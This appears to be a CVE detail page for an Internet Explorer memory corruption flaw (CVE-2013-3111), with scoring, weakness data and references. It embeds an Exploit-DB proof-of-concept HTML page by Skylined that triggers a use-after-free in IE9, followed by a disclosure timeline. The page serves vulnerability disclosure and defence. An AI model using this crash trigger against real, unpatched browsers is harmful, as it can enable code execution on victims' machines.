CVE-2013-3111 : Detail

CVE-2013-3111

Overflow
87.75%V3
Network
2013-06-11
23h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 40907

Publication date : 2016-12-11 23h00 +00:00
Author : Skylined
EDB Verified : Yes

<!-- Source: http://blog.skylined.nl/20161212001.html Synopsis A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability. Known affected software and attack vectors Microsoft Internet Explorer 9 An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path. Details This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. EIP revealed that this was a use-after-free vulnerability. I have included a number of reports created using a predecessor of Bug­Id below. Repro.html: --> <!DOCTYPE html> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=Emulate­IE7" > <script> function go() { document.exec­Command('Select­All'); document.exec­Command('superscript'); set­Timeout(function() { o­Sup­Element=document.get­Elements­By­Tag­Name('sup')[0]; o­Sup­Element.swap­Node(document.document­Element); }, 0); } </script> </head> <body onload="go()"> <address></address> <fieldset></fieldset> </body> </html> <!-- Time-line 27 September 2012: This vulnerability was found through fuzzing. 3 December 2012: This vulnerability was submitted to EIP. 10 December 2012: This vulnerability was rejected by EIP. 12 December 2012: This vulnerability was submitted to ZDI. 25 January 2013: This vulnerability was acquired by ZDI. 15 February 2013: This vulnerability was disclosed to Microsoft by ZDI. 27 June 2013: This vulnerability was address by Microsoft in MS13-047. 12 December 2016: Details of this vulnerability are released. -->

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 10

References

https://www.exploit-db.com/exploits/40907/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.us-cert.gov/ncas/alerts/TA13-168A
Tags : third-party-advisory, x_refsource_CERT